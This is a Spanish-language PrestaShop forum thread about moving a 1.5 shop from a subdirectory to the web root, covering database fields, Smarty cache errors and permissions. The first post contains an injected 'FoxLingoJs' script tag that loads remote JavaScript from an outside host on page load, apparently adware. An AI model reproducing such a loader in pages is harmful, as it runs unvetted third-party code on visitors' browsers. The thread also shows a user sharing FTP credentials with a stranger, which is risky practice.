neouy Posted September 27, 2012 Share Posted September 27, 2012 (edited) Que tal gente? resulta que instalé prestashop en /prestashop y ahora necisitaría dejarlo en la raiz, ya lo moví fisicamente pero no anda nada ni en front ni el back, busque info al respecto y la que aparece habla del archivo settings.inc.php y que cambie ahi lo que diga prestashop pero no veo nada, supongo que eso era en el prestashop 1.4, idea de como hacer esto en el 1.5? <script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);[spam-filter];h.appendChild(s);}catch(ex){[spam-filter]();</script> Edited October 3, 2012 by neouy (see edit history) Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 Que tal gente? resulta que instalé prestashop en /prestashop y ahora necisitaría dejarlo en la raiz, ya lo moví fisicamente pero no anda nada ni en front ni el back, busque info al respecto y la que aparece habla del archivo settings.inc.php y que cambie ahi lo que diga prestashop pero no veo nada, supongo que eso era en el prestashop 1.4, idea de como hacer esto en el 1.5? Revisa en la base de datos la tabla: ps_shop_url Campo: physical_uri 1 Link to comment Share on other sites More sharing options...
llampayec Posted September 27, 2012 Share Posted September 27, 2012 (edited) Ingresa a tu base de datos, busca la tabla ps_configuration, y verifica que tu dominio este configurado correctamente. PS_SHOP_DOMAIN = www.tudominio.com PS_SHOP_DOMAIN_SSL = www.tudominio.com esos valores estan aproximadamente en el id_configuration 231 y 232 respectivamente. Saludos. Edited September 27, 2012 by llampayec (see edit history) 1 Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 Gracias a los 2 por sus respuestas, primero cambié lo que me dijo nadie, resfrezque y me quito la redirección que me hacia al directorio inecsistente pero me aparece la web en blanco no pone nada, luego me fije lo que medijo llampayec, y no veo que cambiar, pone solo el dominio sin el directorio. Idea que que puede estar mal ahora ? Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 A ver en physical_uri ponia /prestashop que era el directorio anterior lo edité y puse solo / esta bien o hay que dejarlo en blanco? Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 A ver en physical_uri ponia /prestashop que era el directorio anterior lo edité y puse solo / esta bien o hay que dejarlo en blanco? Hola, solo tienes que cambiar lo que te he comentado de physical_uri y dejarlo asi: / En el momento que la web te aparece en blanco, ve al fichero /config/config.inc.php Busca esta linea: @ini_set('display_errors', 'off'); Y dejala asi: @ini_set('display_errors', 'on'); Y dime que error te da. Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 Listo jeje, ahora me muestra el lio! aqui va Fatal error: Uncaught exception 'SmartyException' with message 'unable to write file /home/puerta3/public_html/cache/smarty/compile/wrt5064d79a9dadf6.86288378' in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php:44 Stack trace: #0 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_template.php(201): Smarty_Internal_Write_File::writeFile('/home/puerta3/p...', '<?php /* Smarty...', Object(Smarty)) #1 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_templatebase.php(155): Smarty_Internal_Template->compileTemplateSource() #2 /home/puerta3/public_html/classes/module/Module.php(1578): Smarty_Internal_TemplateBase->fetch() #3 /home/puerta3/public_html/modules/favoriteproducts/favoriteproducts.php(106): ModuleCore->display('/home/puerta3/p...', 'favoriteproduct...') #4 /home/puerta3/public_html/classes/Hook.php(410): FavoriteProducts->hookDisplayHeader(Array) #5 /home/puerta3/public_html/classes/controller/FrontController.php(451): HookCore::exec('displayHeader') #6 in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php on line 44 Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 Listo jeje, ahora me muestra el lio! aqui va Fatal error: Uncaught exception 'SmartyException' with message 'unable to write file /home/puerta3/public_html/cache/smarty/compile/wrt5064d79a9dadf6.86288378' in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php:44 Stack trace: #0 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_template.php(201): Smarty_Internal_Write_File::writeFile('/home/puerta3/p...', '<?php /* Smarty...', Object(Smarty)) #1 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_templatebase.php(155): Smarty_Internal_Template->compileTemplateSource() #2 /home/puerta3/public_html/classes/module/Module.php(1578): Smarty_Internal_TemplateBase->fetch() #3 /home/puerta3/public_html/modules/favoriteproducts/favoriteproducts.php(106): ModuleCore->display('/home/puerta3/p...', 'favoriteproduct...') #4 /home/puerta3/public_html/classes/Hook.php(410): FavoriteProducts->hookDisplayHeader(Array) #5 /home/puerta3/public_html/classes/controller/FrontController.php(451): HookCore::exec('displayHeader') #6 in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php on line 44 Listo jeje, ahora me muestra el lio! aqui va Vacia un momento la carpeta: /cache/smarty/compile/ Menos el index.php Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 Sin dudas un tal smarty es el culpable, que cabron! Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 ups! Menos el index.php esa parte la acabo de leer eliminé todo Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 ups! Menos el index.php esa parte la acabo de leer eliminé todo Bueno, no pasa nada, te creas uno con el bloc de notas y le metes esto: <?php header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Location: ../"); exit; Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 listo Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 listo ¿Te funciona ya la tienda? Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 No sigue con mensajes, pero voy a limpiar datos de navegación por si a caso, un momento Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 No sigue con mensajes, pero voy a limpiar datos de navegación por si a caso, un momento ¿Que mensajes te salen ahora? Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 No cambio nada sigue con los mismos mensajes o al menos parecen igual Fatal error: Uncaught exception 'SmartyException' with message 'unable to write file /home/puerta3/public_html/cache/smarty/compile/wrt5064db73c0b156.79772639' in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php:44 Stack trace: #0 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_template.php(201): Smarty_Internal_Write_File::writeFile('/home/puerta3/p...', '<?php /* Smarty...', Object(Smarty)) #1 /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_templatebase.php(155): Smarty_Internal_Template->compileTemplateSource() #2 /home/puerta3/public_html/classes/module/Module.php(1578): Smarty_Internal_TemplateBase->fetch() #3 /home/puerta3/public_html/modules/favoriteproducts/favoriteproducts.php(106): ModuleCore->display('/home/puerta3/p...', 'favoriteproduct...') #4 /home/puerta3/public_html/classes/Hook.php(410): FavoriteProducts->hookDisplayHeader(Array) #5 /home/puerta3/public_html/classes/controller/FrontController.php(451): HookCore::exec('displayHeader') #6 in /home/puerta3/public_html/tools/smarty/sysplugins/smarty_internal_write_file.php on line 44 Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 ¿Te siguen saliendo mensajes de smarty? ¿Que permisos tienes en la carpeta: cache/smarty/compile ? Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 755, pero acabo de ponerle 777 refrezco y nada Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 yosabia que era mala idea instalarlo en un directorio maldita la hora que se me ocurrio Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 755, pero acabo de ponerle 777 refrezco y nada En 755 es correcto. ¿Me puedes pasar datos de acceso FTP, y back-office prestashop, para revisarlo? 1 Link to comment Share on other sites More sharing options...
neouy Posted September 27, 2012 Author Share Posted September 27, 2012 Si no hay problema de mando pvt Link to comment Share on other sites More sharing options...
nadie Posted September 27, 2012 Share Posted September 27, 2012 Si no hay problema de mando pvt Quedo a la espera de esos datos. Un Saludo, Link to comment Share on other sites More sharing options...
neouy Posted October 3, 2012 Author Share Posted October 3, 2012 Quería dar las gracias publicamente a nadie ya que me ayudó a soluciinar éste tema por privado, le pasé mis datos de ftp y él mismo movió los 2 sitos y quedaron andando perfectamente. Gracias nadie por todo, eres un tipo genial y de muy buen corazon! ya que ayudas a los demás por puro altruismo!!! 1 Link to comment Share on other sites More sharing options...
nadie Posted October 3, 2012 Share Posted October 3, 2012 Quería dar las gracias publicamente a nadie ya que me ayudó a soluciinar éste tema por privado, le pasé mis datos de ftp y él mismo movió los 2 sitos y quedaron andando perfectamente. Gracias nadie por todo, eres un tipo genial y de muy buen corazon! ya que ayudas a los demás por puro altruismo!!! Un placer ayudarte y servirte! Un saludo y recuerda que estaremos en el foro, para guiarte por este mundo oscuro y tenebroso. Link to comment Share on other sites More sharing options...
Assher_86 Posted December 10, 2012 Share Posted December 10, 2012 Perdón por reabrir esto, pero tengo el mismo problema, nadie por favor, podrías explicarme como lo solucionaste? Muchas Gracias Link to comment Share on other sites More sharing options...
Saukerl Posted December 19, 2012 Share Posted December 19, 2012 Hoy queria hacer esta misma operacion, que pasos hay que seguir a parte de: 1) En Base de Datos, poner ps_shop_url.physical_uri = "/" 2) Menos el index.php, Vaciar un momento la carpeta: /cache/smarty/compile/ Gracias Link to comment Share on other sites More sharing options...
Javierpozocobo Posted February 25, 2013 Share Posted February 25, 2013 Hola a tod@s. Tengo el mismo problema. Tengo que cambiar todo a la raíz y cambiar lo demás pero no se bien como hacerlo. ¿Alguien me puede ayudar? Me acabo de dar cuenta hoy mismo después de meter mas de 1000 productos en la tienda y necesito abrirla antes de que acabe este mes. Ayuda por favor Link to comment Share on other sites More sharing options...
Jupiterr Posted March 14, 2013 Share Posted March 14, 2013 Estaría genial si comparten la solución. Link to comment Share on other sites More sharing options...
nadie Posted March 14, 2013 Share Posted March 14, 2013 Estaría genial si comparten la solución. Si tu tienes tu tienda Prestashop 1.5 en: http://tudominio.com/prestashop/ Y la quieres colocar directamente en: http://tudominio.com Ve por ejemplo a la base de datos desde phpmyadmin y busca la tabla: ps_shop_url Veras que en el valor del campo: physical_uri tienes esto: /prestashop/ (En este ejemplo es por que la supuesta tienda esta en "tudominio.com/prestashop/") Pues ahora cambia esto: /prestashop/ por esto: / . (En realidad esto que he comentado tambien lo puedes hacer desde el panel de administracion de tu tienda, pero tengo la costumbre de modificarlo en la base de datos directamente) ---------------------------------------------- Luego en el panel de tu hosting, o indicas que el directorio raiz es la carpeta prestashop o mueves el contenido al directorio raiz por ejemplo desde el ftp. Por ultimo vamos al panel de tu tienda, y en la pestaña Preferencias -> SEO/URLS y desactivamos y activamos las urls amigables. Link to comment Share on other sites More sharing options...
Recommended Posts